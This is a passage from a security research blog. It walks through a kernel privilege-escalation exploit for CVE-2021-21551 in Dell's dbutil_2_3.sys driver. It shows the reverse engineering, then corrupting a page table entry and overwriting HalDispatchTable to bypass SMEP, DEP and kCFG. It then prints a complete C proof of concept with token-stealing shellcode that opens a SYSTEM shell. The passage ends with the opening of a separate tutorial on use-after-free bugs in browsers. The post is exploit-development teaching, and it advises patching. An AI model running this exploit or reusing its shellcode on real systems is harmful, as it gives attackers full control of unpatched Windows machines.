The latter option makes sense as this IOCTL allows any client to supply a buffer and have it copied. This driver most likely isn’t expecting unauthorized clients to this IOCTL, meaning the input and output buffers are most likely being used by other kernel mode components/legitimate user-mode clients that need an easy way to pass and receive data. Because of this, it is more than likely it is expected behavior for the output buffer to contain memmove data. The problem is we need to find another memmove routine that allows us to essentially to the inverse of what we did with the arbitrary write primitive.

Talking to a peer of mine, VoidSec about my thought process, he pointed me towards Metasploit, which already has this concept outlined in their POC.

Doing a bit more of reverse engineering, we can see that there is more than one way to reach the arbitrary write memmove routine.

Looking into the sub_15294, we can see that this is the same memmove routine leveraged before.

However, since there is another IOCTL routine that invokes this memmove routine, this is a prime candidate to see if anything about this routine is different (e.g. why create another routine to do the same thing twice? Perhaps this routine is used for something else, like reading memory or copying memory in a different way). Additionally, recall when we performed an arbitrary write, the routines were indexing our buffer at 0x8 and 0x18. This could mean that the call to memmove, via the new IOCTL, could setup our buffer in a way that the buffer is indexed at a different offset, meaning we may be able to achieve an arbitrary read.

It is possible to reach this routine through the IOCTL 0x9B0C1EC4.

Let’s update our POC to attempt to trigger the new IOCTL and see if anything is returned in the output buffer. Essentially, we will set the second value, similar to last time, of our QWORD array to the value we want to interact with, in this case, read, and set everything else to 0. Then, we will reuse the same array of QWORDS as an output buffer and see if anything was written to the buffer.

We can use IDA to identify the proper offset within the driver that the cmp eax, 0x9B0C1EC4 lands on, which is sub_11170+75.

We know that the first IOCTL code we will hit is the arbitrary write IOCTL, so we can pass over the first compare and then hit the second.

We then can see execution reaches the function housing the memmove routine, sub_15294.

After stepping through a few instruction, we can see our input buffer for the read primitive is being propagated and setup for the future call to memmove.

Then, the first part of the buffer is moved into RAX.

Then, the target address we would like to dereference and read from is loaded into RAX.

Then, the target address of KUSER_SHARED_DATA is loaded into RCX and then, as we can see, it will be loaded into RDX. This is great for us, as it means the 2nd argument for a function call on 64-bit systems on Windows is loaded into RDX. Since memmove accepts a pointer to a memory address, this means that this address will be the address that is dereferenced and then has its memory copied into a target buffer (which hopefully is returned in the output buffer parameter of DeviceIoControl).

Recall in our arbitrary write routine that the second parameter, 4343434343434343 was pointed to by a kernel mode address. Look at the above image and see now that we control the address (0xFFFFF78000000000), but this time this address will be dereferenced and whatever this address points to will be written to the buffer pointed to by RCX. Since in our last routine we controlled both arguments to memmove, we can expect that, although the value in RCX is in kernel mode, it will be bubbled back up into user mode and will be placed in our output buffer! We can see just before the return from memmove, the return value is the buffer in which the data was copied into, and we can see the buffer contains 0x0fa0000000000000! Looking in the debugger, this is the value KUSER_SHARED_DATA points to.

We really don’t need to do any more debugging/reverse engineering as we know that we completely control these arguments, based on our write primitive. Pressing g in the debugger, we can see that in our POC console, we have successfully performed an arbitrary read!

We indexed each array element of the QWORD array we sent, per our code, and we can see the last element will contain the dereferenced contents of the value we would like to read from! Now that we have a vanilla 1 QWORD arbitrary read/write primitive, we can now get into out exploitation path.

Why Perform a Data-Only Attack When You Can Corrupt All Of The Memory and Deal With All of the Mitigations? Let’s Have Some Fun And Make Life Artificially Harder On Ourselves!

First, please note I have more in-depth posts on leveraging page table entries and memory paging for kernel exploitation found here and here.

Our goal with this exploitation path will be the following:

  1. Write our shellcode somewhere that is writable in the driver’s virtual address space
  2. Locate the base of the page table entries
  3. Calculate where the page table entry for the memory page where our shellcode lives
  4. Corrupt the page table entry to make the shellcode page RWX, circumventing SMEP and bypassing kernel no-eXecute (DEP)
  5. Overwrite nt!HalDispatchTable+0x8 and circumvent kCFG (kernel Control-Flow Guard) (Note that if kCFG was fully enabled, then VBS/HVCI would then be enabled - rendering this technique useless. kCFG does still have some functionality, even when VBS/HVCI is disabled, like performing bitwise tests to ensure user mode addresses aren’t called from kernel mode. This simply just β€œcircumvents” kCFG by calling a pointer to our shellcode, which exists in kernel mode from the first step).

First we need to find a place in kernel mode that we can write our shellcode to. KUSER_SHARED_DATA is a perfectly fine solution, but there is also a good candidate within the driver itself, located in its .data section, which is already writable.

We can see that from the above image, we have a ton of room to work with, in terms of kernel mode writable memory. Our shellcode is approximately 9 QWORDS, so we will have more than enough room to place our shellcode here.

We will start our shellcode out at .data+0x10. Since we know where the shellcode will go, and since we know it resides in the dbutil_2_3.sys driver, we need to add a routine to our exploit that can retrieve the load address of the kernel, for PTE indexing calculations, and the base address of the driver.

Note that this assumes the process invoking this exploit is that of medium integrity.

The next step, since we know where we want to write to is at an offset of 0x3000 (offset to .data.) + 0x10 (offset to code cave) from the base address of dbutil_2_3.sys, is to locate the page table entry for this memory address, which already is a kernel-mode page and is writable (you could use KUSER_SHARED_DATA+0x800). In order to perform the calculations to locate the page table entry, we first need to bypass page table randomization, a mitigation of Windows 10 after 1607.

This is because we need the base of the page table entries in order to locate the PTE for a specific page in memory (the page table entries are an array of virtual addresses in this case). The Windows API function nt!MiGetPteAddress, at an offset of 0x13, contains, dynamically, the base of the page table entries as this kernel mode function is leveraged to find the base of the page table entries.

Let’s use our read primitive to locate the base of the page table entries (note that I used a static offset from the base of the kernel to nt!MiGetPteAddress, mostly because I am focused on the exploitation phase of this CVE, and not making this exploit portable. You’ll need to update this based on your patch level).

Here we can see we obtain the initial handle to the driver, create a buffer based on our read primitive, send it to the driver, and obtain the base of the page table entries. Then, we programmatically can replicate what nt!MiGetPteAddress does in order to fetch the correct page table entry in the array for the page we will be writing our shellcode to.

Now that we have calculated the page table entry for where our shellcode will be written to, let’s now dereference it in order to preserve what the PTE bits contain, in terms of permissions, so we can modify this value later

Checking in WinDbg, we can also see this is the case!

Now that we have the virtual address for our page table entry and we have extracted the current bits that comprise the entry, let’s write our shellcode to .data+0x10 (dbutil_2_3+0x3010).

After execution of the updated POC, we can clearly see that the arbitrary write routines worked, and our shellcode is located in kernel mode!

Perfect! Now that we have our shellcode in kernel mode, we need to make it executable. After all, the .data section of a PE or driver is read/write. We need to make this an executable region of memory. Since we have the PTE bits already stored, we can update our page table entry bits, stored in our exploit, to contain the bits with the no-eXecute bit cleared, and leverage our arbitrary write primitive to corrupt the page table entry and make it read/write/execute (RWX)!

Perfect! Now that we have made our memory region executable, we need to overwrite the pointer to nt!HalDispatchTable+0x8 with this memory address. Then, when we invoke ntdll!NtQueryIntervalProfile from user mode, which will trigger a call to this QWORD! However, before overwriting nt!HalDispatchTable+0x8, let’s first use our read primitive to preserve the current pointer, so we can put it back after executing our shellcode to ensure system stability, as the Hardware Abstraction Layer is very important on Windows and the dispatch table is referenced regularly.

After preserving the pointer located at nt!HalDispatchTable+0x8 we can use our write primitive to overwrite nt!HalDispatchTable+0x8 with a pointer to our shellcode, which resides in kernel mode memory!

Perfect! At this point, if we invoke nt!HalDispatchTable+0x8’s pointer, we will be calling our shellcode! The last step here, besides restoring everything, is to resolve ntdll!NtQueryIntervalProfile, which eventually performs a call to [nt!HalDispatchTable+0x8].

Then, we can finish up our exploit by adding in the restoration routine to restore nt!HalDispatchTable+0x8.

Let’s set a breakpoint on nt!NtQueryIntervalProfile, which will be called, even though the call originates from ntdll.dll.

After hitting the breakpoint, let’s continue to step through the function until we hit the call nt!KeQueryIntervalProfile function call, and let’s use t to step into it.

Stepping through approximately 9 instructions inside of ntKeQueryIntervalProfile, we can see that we are not directly calling [nt!HalDispatchTable+0x8], but we are calling nt!guard_dispatch_icall. This is part of kCFG, or kernel Control-Flow Guard, which validates indirect function calls (e.g. calling a function pointer).

Clearly, as we can see, the value of [nt!HalDispatchTable+0x8] is pointing to our shellcode, meaning that kCFG should block this. However, kCFG actually requires Virtualization-Based Security (VBS) to be fully implemented. We can see though that kCFG has some functionality in kernel mode, even if it isn’t implemented full scale. The routines still exist in the kernel, which would normally check a bitmap of all indirect function calls and determine if the value that is about to be placed into RAX in the above image is a β€œvalid target”, meaning at compile time, when the bitmap was created, did the address exist and is it apart of any valid control-flow transfer.

However, since VBS is not mainstream yet, requires specific hardware, and because this exploit is being developed in a virtual machine, we can disregard the VBS side for now (note that this is why mitigations like VBS/HVCI/HyperGuard/etc. are important, as they do a great job of thwarting these types of memory corruption vulnerabilities).

Stepping through the call to nt!guard_dispatch_icall, we can actually see that all this routine does essentially, since VBS isn’t enabled, is bitwise test the target address in RAX to confirm it isn’t a user-mode address (basically it checks to see if it is sign-extended). If it is a user-mode address, you’ll actually get a bug check and BSOD. This is why I opted to keep our shellcode in kernel mode, so we can pass this bitwise test!

Then, after stepping through everything, we can see now that control-flow transfer has been handed off to our shellcode.

From here, we can see we have successfully obtained NT AUTHORITY\SYSTEM privileges!

β€œWhen Napoleon lay at Boulogne for a year with his flat-bottom boats and his Grand Army, he was told by someone β€˜There are bitter weeds in VBS/HVCI/kCFG’”

Although this exploit was arduous to create, we can clearly see why data-only attacks, such as the _SEP_TOKEN_PRIVILEGES method outlined by Kasif are optimal. They bypass pretty much any memory corruption related mitigation.

Note that VBS/HVCI actually creates an additional security boundary for us. Page table entries, when VBS is enabled, are actually managed by a higher security boundary, virtual trust level 1 - which is the secure kernel. This means it is not possible to perform PTE manipulation as we did. Additionally, even if this were possible, HVCI is essentially Arbitrary Code Guard (ACG) in the kernel - meaning that it also isn’t possible to manipulate the permissions of memory as we did. These two mitigations would also allow kCFG to be fully implemented, meaning our control-flow transfer would have also failed.

The advisory and patch for this vulnerability can be found here! Please patch your systems or simply remove the driver.

Thank you again to Kasif for this original research! This was certainly a fun exercise :-). Until next time - peace, love, and positivity :-).

Here is the final POC, which can be found on my GitHub:

// CVE-2021-21551: Dell 'dbutil_2_3.sys' Memory Corruption
// Original research: https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/
// Author: Connor McGarr (@33y0re)

#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>

// Vulnerable IOCTL
#define IOCTL_READ_CODE 0x9B0C1EC4

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Obtain the kernel base and driver base
unsigned long long kernelBase(char name[])
  // Defining EnumDeviceDrivers() and GetDeviceDriverBaseNameA() parameters
  LPVOID lpImageBase[1024];
  DWORD lpcbNeeded;
  int drivers;
  char lpFileName[1024];
  unsigned long long imageBase;

  BOOL baseofDrivers = EnumDeviceDrivers(

  // Error handling
  if (!baseofDrivers)
    printf("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %d\n", GetLastError());

  // Defining number of drivers for GetDeviceDriverBaseNameA()
  drivers = lpcbNeeded / sizeof(lpImageBase[0]);

  // Parsing loaded drivers
  for (int i = 0; i < drivers; i++)
      sizeof(lpFileName) / sizeof(char)

    // Keep looping, until found, to find user supplied driver base address
    if (!strcmp(name, lpFileName))
      imageBase = (unsigned long long)lpImageBase[i];

      // Exit loop

  return imageBase;

void exploitWork(void)
  // Store the base of the kernel
  unsigned long long baseofKernel = kernelBase("ntoskrnl.exe");

  // Storing the base of the driver
  unsigned long long driverBase = kernelBase("dbutil_2_3.sys");

  // Print updates
  printf("[+] Base address of ntoskrnl.exe: 0x%llx\n", baseofKernel);
  printf("[+] Base address of dbutil_2_3.sys: 0x%llx\n", driverBase);

  // Store nt!MiGetPteAddress+0x13
  unsigned long long ntmigetpteAddress = baseofKernel + 0xbafbb;

  // Obtain a handle to the driver
  HANDLE driverHandle = CreateFileA(

  // Error handling
  if (driverHandle == INVALID_HANDLE_VALUE)
    printf("[-] Error! Unable to obtain a handle to the driver. Error: 0x%lx\n", GetLastError());
    printf("[+] Successfully obtained a handle to the driver. Handle value: 0x%llx\n", (unsigned long long)driverHandle);

    // Buffer to send to the driver (read primitive)
    unsigned long long inBuf1[4];

    // Values to send
    unsigned long long one1 = 0x4141414141414141;
    unsigned long long two1 = ntmigetpteAddress;
    unsigned long long three1 = 0x0000000000000000;
    unsigned long long four1 = 0x0000000000000000;

    // Assign the values
    inBuf1[0] = one1;
    inBuf1[1] = two1;
    inBuf1[2] = three1;
    inBuf1[3] = four1;

    // Interact with the driver
    DWORD bytesReturned1 = 0;

    BOOL interact = DeviceIoControl(

    // Error handling
    if (!interact)
      printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
      // Last member of read array should contain base of the PTEs
      unsigned long long pteBase = inBuf1[3];

      printf("[+] Base of the PTEs: 0x%llx\n", pteBase);

      // .data section of dbutil_2_3.sys contains a code cave
      unsigned long long shellcodeLocation = driverBase + 0x3010;

      // Bitwise operations to locate PTE of shellcode page
      unsigned long long shellcodePte = (unsigned long long)shellcodeLocation >> 9;
      shellcodePte = shellcodePte & 0x7FFFFFFFF8;
      shellcodePte = shellcodePte + pteBase;

      // Print update
      printf("[+] PTE of the .data page the shellcode is located at in dbutil_2_3.sys: 0x%llx\n", shellcodePte);

      // Buffer to send to the driver (read primitive)
      unsigned long long inBuf2[4];

      // Values to send
      unsigned long long one2 = 0x4141414141414141;
      unsigned long long two2 = shellcodePte;
      unsigned long long three2 = 0x0000000000000000;
      unsigned long long four2 = 0x0000000000000000;

      inBuf2[0] = one2;
      inBuf2[1] = two2;
      inBuf2[2] = three2;
      inBuf2[3] = four2;

      // Parameter for DeviceIoControl
      DWORD bytesReturned2 = 0;

      BOOL interact1 = DeviceIoControl(

      // Error handling
      if (!interact1)
        printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
        // Last member of read array should contain PTE bits
        unsigned long long pteBits = inBuf2[3];

        printf("[+] PTE bits for the shellcode page: %p\n", pteBits);

          ; Windows 10 1903 x64 Token Stealing Payload
          ; Author Connor McGarr

          [BITS 64]

            mov rax, [gs:0x188]     ; Current thread (_KTHREAD)
            mov rax, [rax + 0xb8]   ; Current process (_EPROCESS)
            mov rbx, rax        ; Copy current process (_EPROCESS) to rbx
            mov rbx, [rbx + 0x2f0]    ; ActiveProcessLinks
            sub rbx, 0x2f0          ; Go back to current process (_EPROCESS)
            mov rcx, [rbx + 0x2e8]    ; UniqueProcessId (PID)
            cmp rcx, 4          ; Compare PID to SYSTEM PID
            jnz __loop            ; Loop until SYSTEM PID is found

            mov rcx, [rbx + 0x360]    ; SYSTEM token is @ offset _EPROCESS + 0x360
            and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
            mov [rax + 0x360], rcx    ; Copy SYSTEM token to current process

            xor rax, rax        ; set NTSTATUS STATUS_SUCCESS
            ret             ; Done!


        // One QWORD arbitrary write
        // Shellcode is 67 bytes (67/8 = 9 unsigned long longs)
        unsigned long long shellcode1 = 0x00018825048B4865;
        unsigned long long shellcode2 = 0x000000B8808B4800;
        unsigned long long shellcode3 = 0x02F09B8B48C38948;
        unsigned long long shellcode4 = 0x0002F0EB81480000;
        unsigned long long shellcode5 = 0x000002E88B8B4800;
        unsigned long long shellcode6 = 0x8B48E57504F98348;
        unsigned long long shellcode7 = 0xF0E180000003608B;
        unsigned long long shellcode8 = 0x4800000360888948;
        unsigned long long shellcode9 = 0x0000000000C3C031;

        // Buffers to send to the driver (write primitive)
        unsigned long long inBuf3[4];
        unsigned long long inBuf4[4];
        unsigned long long inBuf5[4];
        unsigned long long inBuf6[4];
        unsigned long long inBuf7[4];
        unsigned long long inBuf8[4];
        unsigned long long inBuf9[4];
        unsigned long long inBuf10[4];
        unsigned long long inBuf11[4];

        // Values to send
        unsigned long long one3 = 0x4141414141414141;
        unsigned long long two3 = shellcodeLocation;
        unsigned long long three3 = 0x0000000000000000;
        unsigned long long four3 = shellcode1;

        unsigned long long one4 = 0x4141414141414141;
        unsigned long long two4 = shellcodeLocation + 0x8;
        unsigned long long three4 = 0x0000000000000000;
        unsigned long long four4 = shellcode2;

        unsigned long long one5 = 0x4141414141414141;
        unsigned long long two5 = shellcodeLocation + 0x10;
        unsigned long long three5 = 0x0000000000000000;
        unsigned long long four5 = shellcode3;

        unsigned long long one6 = 0x4141414141414141;
        unsigned long long two6 = shellcodeLocation + 0x18;
        unsigned long long three6 = 0x0000000000000000;
        unsigned long long four6 = shellcode4;

        unsigned long long one7 = 0x4141414141414141;
        unsigned long long two7 = shellcodeLocation + 0x20;
        unsigned long long three7 = 0x0000000000000000;
        unsigned long long four7 = shellcode5;

        unsigned long long one8 = 0x4141414141414141;
        unsigned long long two8 = shellcodeLocation + 0x28;
        unsigned long long three8 = 0x0000000000000000;
        unsigned long long four8 = shellcode6;

        unsigned long long one9 = 0x4141414141414141;
        unsigned long long two9 = shellcodeLocation + 0x30;
        unsigned long long three9 = 0x0000000000000000;
        unsigned long long four9 = shellcode7;

        unsigned long long one10 = 0x4141414141414141;
        unsigned long long two10 = shellcodeLocation + 0x38;
        unsigned long long three10 = 0x0000000000000000;
        unsigned long long four10 = shellcode8;

        unsigned long long one11 = 0x4141414141414141;
        unsigned long long two11 = shellcodeLocation + 0x40;
        unsigned long long three11 = 0x0000000000000000;
        unsigned long long four11 = shellcode9;

        inBuf3[0] = one3;
        inBuf3[1] = two3;
        inBuf3[2] = three3;
        inBuf3[3] = four3;

        inBuf4[0] = one4;
        inBuf4[1] = two4;
        inBuf4[2] = three4;
        inBuf4[3] = four4;

        inBuf5[0] = one5;
        inBuf5[1] = two5;
        inBuf5[2] = three5;
        inBuf5[3] = four5;

        inBuf6[0] = one6;
        inBuf6[1] = two6;
        inBuf6[2] = three6;
        inBuf6[3] = four6;

        inBuf7[0] = one7;
        inBuf7[1] = two7;
        inBuf7[2] = three7;
        inBuf7[3] = four7;

        inBuf8[0] = one8;
        inBuf8[1] = two8;
        inBuf8[2] = three8;
        inBuf8[3] = four8;

        inBuf9[0] = one9;
        inBuf9[1] = two9;
        inBuf9[2] = three9;
        inBuf9[3] = four9;

        inBuf10[0] = one10;
        inBuf10[1] = two10;
        inBuf10[2] = three10;
        inBuf10[3] = four10;

        inBuf11[0] = one11;
        inBuf11[1] = two11;
        inBuf11[2] = three11;
        inBuf11[3] = four11;

        DWORD bytesReturned3 = 0;
        DWORD bytesReturned4 = 0;
        DWORD bytesReturned5 = 0;
        DWORD bytesReturned6 = 0;
        DWORD bytesReturned7 = 0;
        DWORD bytesReturned8 = 0;
        DWORD bytesReturned9 = 0;
        DWORD bytesReturned10 = 0;
        DWORD bytesReturned11 = 0;

        BOOL interact2 = DeviceIoControl(

        BOOL interact3 = DeviceIoControl(

        BOOL interact4 = DeviceIoControl(

        BOOL interact5 = DeviceIoControl(

        BOOL interact6 = DeviceIoControl(

        BOOL interact7 = DeviceIoControl(

        BOOL interact8 = DeviceIoControl(

        BOOL interact9 = DeviceIoControl(

        BOOL interact10 = DeviceIoControl(

        // A lot of error handling
        if (!interact2 || !interact3 || !interact4 || !interact5 || !interact6 || !interact7 || !interact8 || !interact9 || !interact10)
          printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
          printf("[+] Successfully wrote the shellcode to the .data section of dbutil_2_3.sys at address: 0x%llx\n", shellcodeLocation);

          // Clear the no-eXecute bit
          unsigned long long taintedPte = pteBits & 0x0FFFFFFFFFFFFFFF;

          printf("[+] Corrupted PTE bits for the shellcode page: %p\n", taintedPte);

          // Clear the no-eXecute bit in the actual PTE
          // Buffer to send to the driver (write primitive)
          unsigned long long inBuf13[4];

          // Values to send
          unsigned long long one13 = 0x4141414141414141;
          unsigned long long two13 = shellcodePte;
          unsigned long long three13 = 0x0000000000000000;
          unsigned long long four13 = taintedPte;

          // Assign the values
          inBuf13[0] = one13;
          inBuf13[1] = two13;
          inBuf13[2] = three13;
          inBuf13[3] = four13;

          // Interact with the driver
          DWORD bytesReturned13 = 0;

          BOOL interact12 = DeviceIoControl(

          // Error handling
          if (!interact12)
            printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
            printf("[+] Successfully corrupted the PTE of the shellcode page! The kernel mode page holding the shellcode should now be RWX!\n");

            // Offset to nt!HalDispatchTable+0x8
            unsigned long long halDispatch = baseofKernel + 0x427258;

            // Use arbitrary read primitive to preserve nt!HalDispatchTable+0x8
            // Buffer to send to the driver (write primitive)
            unsigned long long inBuf14[4];

            // Values to send
            unsigned long long one14 = 0x4141414141414141;
            unsigned long long two14 = halDispatch;
            unsigned long long three14 = 0x0000000000000000;
            unsigned long long four14 = 0x0000000000000000;

            // Assign the values
            inBuf14[0] = one14;
            inBuf14[1] = two14;
            inBuf14[2] = three14;
            inBuf14[3] = four14;

            // Interact with the driver
            DWORD bytesReturned14 = 0;

            BOOL interact13 = DeviceIoControl(

            // Error handling
            if (!interact13)
              printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
              // Last member of read array should contain preserved nt!HalDispatchTable+0x8 value
              unsigned long long preservedHal = inBuf14[3];

              printf("[+] Preserved nt!HalDispatchTable+0x8 value: 0x%llx\n", preservedHal);

              // Leveraging arbitrary write primitive to overwrite nt!HalDispatchTable+0x8
              // Buffer to send to the driver (write primitive)
              unsigned long long inBuf15[4];

              // Values to send
              unsigned long long one15 = 0x4141414141414141;
              unsigned long long two15 = halDispatch;
              unsigned long long three15 = 0x0000000000000000;
              unsigned long long four15 = shellcodeLocation;

              // Assign the values
              inBuf15[0] = one15;
              inBuf15[1] = two15;
              inBuf15[2] = three15;
              inBuf15[3] = four15;

              // Interact with the driver
              DWORD bytesReturned15 = 0;

              BOOL interact14 = DeviceIoControl(

              // Error handling
              if (!interact14)
                printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
                printf("[+] Successfully overwrote the pointer at nt!HalDispatchTable+0x8!\n");

                // Locating nt!NtQueryIntervalProfile
                NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(

                // Error handling
                if (!NtQueryIntervalProfile)
                  printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
                  // Print update for found ntdll!NtQueryIntervalProfile
                  printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

                  // Calling nt!NtQueryIntervalProfile
                  ULONG exploit = 0;


                  // Restoring nt!HalDispatchTable+0x8
                  // Buffer to send to the driver (write primitive)
                  unsigned long long inBuf16[4];

                  // Values to send
                  unsigned long long one16 = 0x4141414141414141;
                  unsigned long long two16 = halDispatch;
                  unsigned long long three16 = 0x0000000000000000;
                  unsigned long long four16 = preservedHal;

                  // Assign the values
                  inBuf16[0] = one16;
                  inBuf16[1] = two16;
                  inBuf16[2] = three16;
                  inBuf16[3] = four16;

                  // Interact with the driver
                  DWORD bytesReturned16 = 0;

                  BOOL interact15 = DeviceIoControl(

                  // Error handling
                  if (!interact15)
                    printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
                    printf("[+] Successfully restored the pointer at nt!HalDispatchTable+0x8!\n");
                    printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

                    // Spawning an NT AUTHORITY\SYSTEM shell
                    system("cmd.exe /c cmd.exe /K cd C:\\");

// Call exploitWork()
void main(void)

Exploit Development: Browser Exploitation on Windows - Understanding Use-After-Free Vulnerabilities

21 April 2021 at 00:00


Browser exploitation is a topic that has been incredibly daunting for myself. Looking back at my journey over the past year and a half or so since I started to dive into binary exploitation, specifically on Windows, I remember experiencing this same feeling with kernel exploitation. I can still remember one day just waking up and realizing that I just need to just dive into it if I ever wanted to advance my knowledge. Looking back, although I still have tons to learn about it and am still a novice at kernel exploitation, I realized it was my will to just jump in, irrespective of the difficulty level, that helped me to eventually grasp some of the concepts surrounding more modern kernel exploitation.

Browser exploitation has always been another fear of mine, even more so than the Windows kernel, due to the fact not only do you need to understand overarching exploit primitives and vulnerability classes that are specific to Windows, but also needing to understand other topics such as the different JavaScript engines, just-in-time (JIT) compilers, and a plethora of other subjects, which by themselves are difficult (at least to me) to understand. Plus, the addition of browser specific mitigations is also something that has been a determining factor in myself putting off learning this subject.

What has always been frightening, is the lack (in my estimation) of resources surrounding browser exploitation on Windows. Many people can just dissect a piece of code and come up with a working exploit within a few hours. This is not the case for myself. The way I learn is to take a POC, along with an accompanying blog, and walk through the code in a debugger. From there I analyze everything that is going on and try to ask myself the question β€œWhy did the author feel it was important to mention X concept or show Y snippet of code?”, and to also attempt to answer that question. In addition to that, I try to first arm myself with the prerequisite knowledge to even begin the exploitation process (e.g. β€œThe author mentioned this is a result of a fake virtual function table. What is a virtual function table in the first place?”). This helps me to understand the underlying concepts. From there, I am able to take other POCs that leverage the same vulnerability classes and weaponize them - but it takes that first initial walkthrough for myself.

Since this is my learning style, I have found that blogs on Windows browser exploitation which start from the beginning are very sparse. Since I use blogging as a mechanism not only to share what I know, but to reinforce the concepts I am attempting to hit home, I thought I would take a few months, now with Advanced Windows Exploitation (AWE) being canceled again for 2021, to research browser exploitation on Windows and to talk about it.

Please note that what is going to be demonstrated here, is not heap spraying as an execution method. These will be actual vulnerabilities that are exploited. However, it should also be noted that this will start out on Internet Explorer 8, on Windows 7 x86. We will still outline leveraging code-reuse techniques to bypass DEP, but don’t expect MemGC, Delay Free, etc. to be enabled for this tutorial, and most likely for the next few. This will simply be a documentation of my thought process, should you care, of how I went from crash to vulnerability identification, and hopefully to a shell in the end.

Understanding Use-After-Free Vulnerabilities

As was aforesaid above, the vulnerability we will be taking a look at is a use-after-free. More specifically, MS13-055, which is titled as Microsoft Internet Explorer CAnchorElement Use-After-Free. What exactly does this mean? Use-after-free vulnerabilities are well documented, and fairly common. There are great explanations out there, but for brevity and completeness sake I will take a swing at explaining them. Essentially what happens is this - a chunk of memory (chunks are just contiguous pieces of memory, like a buffer. Each piece of memory, known as a block, on x86 systems are 0x8 bytes, or 2 DWORDS. Don’t over-think them) is allocated by the heap manager (on Windows there is the front-end allocator, known as the Low-Fragmentation Heap, and the standard back-end allocator. We will talk about these in the a future section). At some point during the program’s lifetime, this chunk of memory, which was previously allocated, is β€œfreed”, meaning the allocation is cleaned up and can be re-used by the heap manager again to service allocation requests.

Let’s say the allocation was at the memory address 0x15000. Let’s say the chunk, when it was allocated, contained 0x40 bytes of 0x41 characters. If we dereferenced the address 0x15000, you could expect to see 0x41s (this is psuedo-speak and should just be taken at a high level for now). When this allocation is freed, if you go back and dereference the address again, you could expect to see invalid memory (e.g. something like ???? in WinDbg), if the address hasn’t been used to service any allocation requests, and is still in a free state.

Where the vulnerability comes in is the chunk, which was allocated but is now freed, is still referenced/leveraged by the program, although in a β€œfree” state. This usually causes a crash, as the program is attempting to either access and/or dereference memory that simply isn’t valid anymore. This usually causes some sort of exception, resulting in a program crash.

Now that the definition of what we are attempting to take advantage of is out of the way, let’s talk about how this condition arises in our specific case.

C++ Classes, Constructors, Destructors, and Virtual Functions

You may or may not know that browsers, although they interpret/execute JavaScript, are actually written in C++. Due to this, they adhere to C++ nomenclature, such as implementation of classes, virtual functions, etc. Let’s start with the basics and talk about some foundational C++ concepts.

A class in C++ is very similar to a typical struct you may see in C. The difference is, however, in classes you can define a stricter scope as to where the members of the class can be accessed, with keywords such as private or public. By default, members of classes are private, meaning the members can only be accessed by the class and by inherited classes. We will talk about these concepts in a second. Let’s give a quick code example.

#include <iostream>
using namespace std;

// This is the main class (base class)
class classOne

    // This is our user defined constructor
      cout << "Hello from the classOne constructor" << endl;

    // This is our user defined destructor
      cout << "Hello from the classOne destructor!" << endl;

    virtual void sharedFunction(){};        // Prototype a virtual function
    virtual void sharedFunction1(){};       // Prototype a virtual function

// This is a derived/sub class
class classTwo : public classOne

    // This is our user defined constructor
      cout << "Hello from the classTwo constructor!" << endl;

    // This is our user defined destructor
      cout << "Hello from the classTwo destructor!" << endl;

    void sharedFunction()               
      cout << "Hello from the classTwo sharedFunction()!" << endl;    // Create A DIFFERENT function definition of sharedFunction()

    void sharedFunction1()
      cout << "Hello from the classTwo sharedFunction1()!" << endl;   // Create A DIFFERENT function definition of sharedFunction1()

// This is another derived/sub class
class classThree : public classOne

    // This is our user defined constructor
      cout << "Hello from the classThree constructor" << endl;

    // This is our user defined destructor
      cout << "Hello from the classThree destructor!" << endl;
    void sharedFunction()
      cout << "Hello from the classThree sharedFunction()!" << endl;  // Create A DIFFERENT definition of sharedFunction()

    void sharedFunction1()
      cout << "Hello from the classThree sharedFunction1()!" << endl;   // Create A DIFFERENT definition of sharedFunction1()

// Main function
int main()
  // Create an instance of the base/main class and set it to one of the derivative classes
  // Since classTwo and classThree are sub classes, they inherit everything classOne prototypes/defines, so it is acceptable to set the address of a classOne object to a classTwo object
  // The class 1 constructor will get called twice (for each classOne object created), and the classTwo + classThree constructors are called once each (total of 4)
  classOne* c1 = new classTwo;
  classOne* c1_2 = new classThree;

  // Invoke the virtual functions

  // Destructors are called when the object is explicitly destroyed with delete
  delete c1;
  delete c1_2;

The above code creates three classes: one β€œmain”, or β€œbase” class (classOne) and then two classes which are β€œderivative”, or β€œsub” classes of the base class classOne. (classTwo and classThree are the derivative classes in this case).

Each of the three classes has a constructor and a destructor. A constructor is named the same as the class, as is proper nomenclature. So, for instance, a constructor for class classOne is classOne(). Constructors are essentially methods that are called when an object is created. Its general purpose is that they are used so that variables can be initialized within a class, whenever a class object is created. Just like creating an object for a structure, creating a class object is done as such: classOne c1. In our case, we are creating objects that point to a classOne class, which is essentially the same thing, but instead of accessing members directly, we access them via pointers. Essentially, just know that whenever a class object is created (classOne* cl in our case), the constructor is called when creating this object.

In addition to each constructor, each class also has a destructor. A destructor is named ~nameoftheClass(). A destructor is something that is called whenever the class object, in our case, is about to go out of scope. This could be either code reaching the end of execution or, as is in our case, the delete operator is invoked against one of the previously declared class objects (cl and cl_2). The destructor is the inverse of the constructor - meaning it is called whenever the object is being deleted. Note that a destructor does not have a type, does not accept function arguments, and does not return a value.

